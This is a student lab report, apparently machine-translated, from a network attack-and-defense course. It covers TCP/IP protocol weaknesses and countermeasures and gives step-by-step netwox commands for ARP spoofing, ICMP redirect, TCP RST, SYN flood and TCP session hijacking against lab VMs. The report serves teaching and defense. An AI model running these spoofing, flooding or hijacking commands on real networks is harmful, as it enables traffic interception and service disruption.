20,199,106 2019-2020-2 "network attack and defense practice," the fifth week of work

Others 2020-04-01 23:01:29 views: null

20,199,106 2019-2020-2 "network attack and defense practice," the fifth week of work

Job Description

This work belongs courses Network attack and defense practice
Where this requirement in the job Fifth week job: network sniffer and protocol analyzer
My goal for the course There is a more comprehensive understanding of network attack and defense technology to master the basic offensive and defensive operations.
In particular aspects of the job which helped me achieve goals Hands-on exercises a TCP / IP network protocol attacks Principles and Practice

Text of the job

Practice what

The fifth chapter describes the various attacks TCP / IP network protocol.

Overview :

  • Five security attributes of network security: confidentiality, integrity, availability, authenticity and non-repudiation.
    • Network attack four basic modes: interception, interruption, tampering, forgery.
    • TCP / IP network protocol stack security flaws:
      • Network Interface Layer: an Ethernet protocol, when the network interface in promiscuous mode can be intercepted and sniff packets directly, while the lack of authentication mechanisms the source MAC address, MAC address spoofing achieved.
      • Internet layer: IP protocol only on the destination address for forwarding, do not check whether the source IP address is real and effective, vulnerable to IP spoofing. It also includes a source routing abuse, the IP fragment attack, spoofing and ARP, ICMP redirect, the Smurf attacks.
      • Transport Layer: After the connection process to establish a session TCP, it is very vulnerable to forgery and spoofing attacks, an attacker can perform direct TCP RST attack interrupted session. Simultaneous TCP three-way handshake process design flaw, an attacker can perform a SYN flood attack.
      • Application Layer: Some popular application-level protocols HTTP, FTP, POP3 / SMTP, DNS etc. lack of security design.

Network layer attacks and countermeasures

  • IP source address spoofing
    • Principle: Use only the destination address of the packet forwarding route without the source address to verify authenticity.
    • Attack process:
    • Attack tools: netwox, wireshark, nmap
    • Precautions: Use the randomized first test sequence, using the network layer security transfer protocol, based on trust policy to avoid using IP addresses, routers and gateways in the implementation of packet filtering.
  • ARP spoofing attack
    • Principle: ARP protocol believe that all internal LAN users are trusted in the design, which makes it very easy to be injected into the ARP cache of fake IP address to the mapping between MAC addresses.
    • Attack process:
    • Attack tools: DSniff in Arpspoof, arpison, Ettercap, Netwox.
    • Precautions: static binding of IP address and MAC address of the host key mapping relationship, using the corresponding ARP prevention tools, network topology using virtual subnet segments, encrypted transmission.
  • ICMP redirect attack Router
    • Principle: the use of ICMP redirect packet routing change Host Routing Table, send a redirect to the target host, disguised as a router, so that data packets target machine to attack aircraft to strengthen monitoring.
    • Attack process:
    • Tools: netwox
    • Precautions: Some types of ICMP packets filtering based on, setting firewall filtering, ICMP redirect messages of judgment is not from the local router
  • Transport layer protocol attacks and preventive measures
    • TCP RST attack
      • Principle: TCP protocol header has a RESET, the flag is 1, the host receives the data packet that is about to disconnect the TCP session connection. tcp reset packet is directly closed out a TCP session connection.
      • Attack process:
      • Tools: netwox
    • TCP session hijacking attacks
      • Principle: TCP Session Hijacking hijacking communicating parties already established TCP session connection, fake identity of one of the parties for further communication with another party. The core of which is the communicating party validation of the session by TCP.
      • Attack process:
      • Precautions: Disable source routing on the host, the static IP and IP-MAC mapping table to avoid ARP spoofing, quote and filter ICMP redirect messages
    • TCP SYN Flood Denial of Service Attack
      • Principle: TCP three-way handshake defects based on the target host to send a large number of forged source address of the SYN connection request, the connection queue consumes resources of the target host, which can not serve properly.
      • Attack process:
      • Precautions: SYN-Cookie technology (not to allocate resources before the connection information does not quite reach); firewall address status monitoring technology (the TCP connection to the target server state is divided into NEW, GOOD, BAD).
    • UDP Flood Denial of Service Attack
      • Principle: sending a large number of UDP packets to the target host and the network, resulting in significant computational load hoist target host, or by network congestion, so that the target host and network into an unusable state, denial of service attacks.
      • Precautions: Disable or filter monitoring and response services, disable, or other filtering UDP services.

experiment procedure

Experimental task

Network attack and defense in the experimental environment (to SEED_VM as attack aircraft, Linux Metasploitable / Windows Metasploitable as target drones) to complete TCP / IP protocol stack attack experimental points of the agreement, including the ARP cache spoofing attacks, ICMP redirect attacks, SYN Flood attacks, TCP RST attacks and TCP session hijacking attacks (bonus).

lab environment

lab environment IP addresses Mark Address
Drone A: winXP 192.168.200.3 00: 0C: 29: 03: 4F: 2D
Drone B: linux Metasploitable 192.168.200.125 00: 0c: 29: 0c: 64: 32
Attack aircraft C: kali 192.168.200.2 00:0c:29:7e:33:d5

1, ARP cache spoofing attack

First, enter the command in the kali apt-get install netwoxinstallation netwox.
The attack device input command netwox, select 5-> "33" ->netwox 33 -b 00:0C:29:03:4F:2D -g 192.168.200.125 -h 00:0C:29:03:4F:2D -i 192.168.200.2

Note:
33 can be constructed of any tool Ethernet ARP packet data, tool 80 may periodically send ARP response packet, the two tools can be arp attack;
netwox 33 -b (A的mac地址) -g (B的ip地址) -h (A的mac地址) -i (A的ip地址)wherein, -b network protocol associated display module; -g display module associated with a client; -H display module associated with the server; -i display module related to the detected communication host;

Command execution results are as follows:

A drone in the input arp -aview the target host A arp cache stored in the IP (B) / MAC (C ) such mapping so as to achieve the purpose of deceiving.

B in the same manner to deceive; open wirshark in kali, we can see the communication between A and B has been captured on the host C, has been successfully achieved can be seen ARP spoofing.

2, ICMP redirect attack routes

General and IP source address spoofing technology combined with practice, attack aircraft using the tools Netwox No. 86, the command execution attack netwox 86 -f "host 192.168.200.3" -g 192.168.200.2 -i 192.168.200.1 , forged identity -f representatives drone address, next hop address -g representatives drones, representing -i.

Let drone access to any page, Comparative victim host routing table before and after the ICMP redirect attack, attack aircraft found the IP address changes as shown below:

Visible attack aircraft successfully posing as the gateway ip address.

3, TCP RST attack

• Before the attack, the first log on to the host A host B: telnet 192.168.200.125; C for use on Netwoxthe 78号tool "Reset every TCP packet" to achieve TCP RST attack netwox 78 -i 192.168.200.125, view the host A, free to enter a command, then Enter, found that A and B disconnected:

Open View C wireshark capture situation posing find B C RST information is transmitted to the A, disconnect the A, B are connected:

4, SYN Flood attack

A first in the telnetlanding B, connection is established,
selection of the number 76 "synflood" tool in C, and enter the destination address: 192.168.200.125;

Open C, wireshark, unit C sends a visible attack target drone B ip of a large number of false connection request SYN.

A view of just the login page, found no connection and disconnection, probably because the target drone B more powerful?

5, TCP session hijacking attacks

First, the use of telnetlanding B in A; Wireshark open, the input filter in C telnet, A, and then enter pwda command. See in wireshark C, the second window, telnetthe lower will see p, w, dpackets.

Select the last package, open view of the following values ​​TransmissionControl Protocol, source port, destination port, Next Seq Num and ACK values.

After obtaining the information, the attack machine tool netwox C using a forged tcp A packet sent to B. After sent successfully, the original A will lose connection while B will Kali as a visitor, so to achieve a session hijacking.
Instructions are as follows:
netwox 40 --ip4-dontfrag --ip4-offsetfrag 0 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 192.168.200.3 --ip4-dst 192.168.200.125 --tcp-src 1069 --tcp-dst 23 --tcp-seqnum 1387 --tcp-acknum 104 --tcp-ack --tcp-psh --tcp-window 64 --tcp-data "6D6B646972206161"
Input ip4-src, after the address A, the address input your B after ip4-dst, tcp-src represents the original port number (which varies), and marked tcp-seqnum above input tcp-acknum value, tcp-data C is sent to hexadecimal value data, here are mkdir aahexadecimal. The same can be observed in Wireshark value transmitted.

Visible attack aircraft posing a C ip A successfully transmits a packet to B.

Learning problems encountered and solutions

One problem: the virtual machine boot always insufficient memory.

Solution: try a few times just fine, also tried to change the virtual machine's memory a bit, the effect is not obvious.

Question two: Install netwox unsuccessful.

Solve: kali attack aircraft did not networked.

Feelings and learning experience

In addition to the beginning of the experiment and the virtual network machine is turned on there is some question, back to do quite well, thank the students for their help.

Reference material

"Network attack and defense technology and practice" Jianwei Zhuge

"How winXP view mac address"

"Arp Baidu Encyclopedia"

Guess you like

Origin www.cnblogs.com/wyrr/p/12616557.html
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com